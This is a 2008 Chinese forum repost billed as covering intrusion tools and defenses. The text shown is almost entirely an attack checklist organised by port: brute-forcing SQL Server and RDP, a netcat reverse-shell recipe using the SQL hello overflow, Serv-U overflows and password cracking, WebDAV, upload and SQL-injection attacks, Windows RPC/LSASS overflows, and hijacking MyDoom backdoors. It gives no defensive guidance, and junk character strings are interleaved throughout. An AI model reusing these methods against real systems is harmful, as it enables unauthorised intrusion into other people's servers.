青华模具培训学校

 找回密码
 注册

QQ登录

只需一步,快速开始

青华模具培训学院
查看: 1295|回复: 1

入侵方法以及工具防范

[复制链接]
发表于 2008-3-2 15:34 | 显示全部楼层 |阅读模式
转自:杜松之家
+ ~( C( n' ~& S# X: E. L& z8 G+ T" m' n: ?3 r9 k
1 Q- ^" g8 l! C/ c
http://www.juniperbbs.net/viewthread.php?tid=15268&frameon=no
( k# p) ?8 S! Z, o+ G7 h4 E4 \工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 , P; [( x: R* G' n
   # C# ?  \' c$ f/ `& W; o: B5 ?1 S
0 @0 C7 k5 I2 E+ w- {1 ]% T) T: j
  1. 1433端口入侵
9 @& }9 X; I. Q& D. P( s; E! r: E# Q4 g$ K' p0 u$ T5 g3 q8 P& R
  scanport.exe 查有1433的机器 4 l# P5 G. R+ c# T9 k: Z( O

# B) z, h3 i# E  SQLScanPass.exe 进行字典暴破(字典是关键) 0 _! z5 r, E' D
0 r% {0 N/ P; \& K
  最后 SQLTools.exe入侵 3 t$ g8 x( d  F; |
7 z" ?, N' @' e5 |! u/ J+ J3 {" S
  =============================
8 g! Q& B1 B9 w  f+ @
7 O  C1 \( w& Q8 U+ h. ^  对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 ! U$ I6 J" H. l. |; r  U

/ D4 C, n/ O+ e+ J( U  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 6 O0 v7 J0 }  W5 c7 j) ]

0 F9 K! l# ?- O( h  (以上反向的,测试成功)
' c6 }4 w; G0 S, O* r0 ~8 V
- e; x- c, ?: m6 x  }  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
! X9 f; u9 i6 }, F* Z  
3 S, B9 t3 t; _8 a& V4 H  2. 4899端口入侵 ; e6 }1 s/ a$ G" M5 F

6 |& T; t6 u5 r$ j6 M( J$ P  用4899过滤器.exe,扫描空口令的机器    ( f) c% g- h* P" B9 y5 S
8 p. {" R5 ?( j& ~4 f4 y
  3. 3899的入侵 . ^) I# f  ^  j% c7 ^7 `
5 {7 y- [% @3 m  Y+ s$ }
  对很早的机器,可以试试3389的溢出(win3389ex.exe) # ^/ ^! @% A7 {# V+ @0 o/ e) z
8 C. H# D& c, {2 z& B4 j0 q7 w
  对2000的机器,可以试试字典暴破。(tscrack.exe)
; R) i8 Z/ C% h+ \) M5 S   3 }$ ], |/ K- d% B8 k
  4. 80入侵 2 B- b1 |' u8 O3 |) [% ~) d0 e3 `

4 f2 S3 e% d$ C1 X  C6 V4 g  对sp3以前的机器,可以用webdav入侵;
4 ]% B1 ?- U1 V+ P# J2 w
; r: H, ~& r; H: y' a4 h  i  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
$ i# m/ z, e  R. k: B3 J1 U6 ~1 ^0 J& P3 O
  可以利用SQL进行注入。(小榕的注入软件)。
$ i. I4 P) y+ u5 Q9 K$ s8 f9 F( m7 d# d2 L& M5 `- g/ I
  5. serv-u入侵(21端口)
1 v/ @% S# m- e9 P  m7 C) z. n, \& P% A, @( h5 W/ R
  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
( Y1 o& b+ S, S- D, j1 O
0 C, j' D& j3 {7 B( B4 M- w* @  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 5 b3 W0 j- E8 D" b3 Q& ~
+ E8 z1 {, {+ g+ J% e) A4 `
  ======================================
/ j% K$ T+ m- K5 ]! o. N) L% L+ H5 j( j+ [& L
  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 8 J1 a( l& o2 x% I
; R0 K" K/ w; t4 M3 w4 V9 A
  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 5 v% {$ J0 A. ^6 A# M
   5 p$ h: ~9 ]" ]' j* o0 R
  6. 554端口 1 h+ W$ s  x& a3 [

4 T  h( p2 `  s) P  用real554.exe入侵。 1 w0 ^( ~) W- @0 d  A6 F
   7 ^, X" d2 ^) s- Z
  7. 6129端口
+ d  V& l' I- E# [9 G2 L. o0 c) Q
- f6 ?! F1 I9 w$ j( n: n- N  用DameWare6129.exe入侵。 : @8 ^* t! U5 R0 o- {- C
6 w* P1 B$ ]# f( ^3 e
  8. 系统漏洞 3 R% J1 I7 f9 t$ W& T4 h/ G" @7 Y7 {
% _: t0 Y' s( Z  i) l; i: O3 o
  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
) Z0 s; t$ j  I% A4 b
5 q6 J. y* y( \( ^- V4 [  u  进行溢出入侵。 & i' }# U3 t( I
* D3 |2 n! E5 [& I& H
  9. 3127等端口
" x' t- }6 o+ n. a5 `9 @$ o% S, z5 }
  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 : F, v  c. |1 `+ u9 y! f

  y4 N  A/ L* `9 ]9 t* b  10. 其他入侵
发表于 2008-3-9 10:43 | 显示全部楼层
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|关于我们|sitemap|小黑屋|Archiver|手机版|UG网-UG技术论坛-青华数控模具培训学校 ( 粤ICP备15108561号 )

GMT+8, 2025-6-23 07:23 , Processed in 0.120354 second(s), 25 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表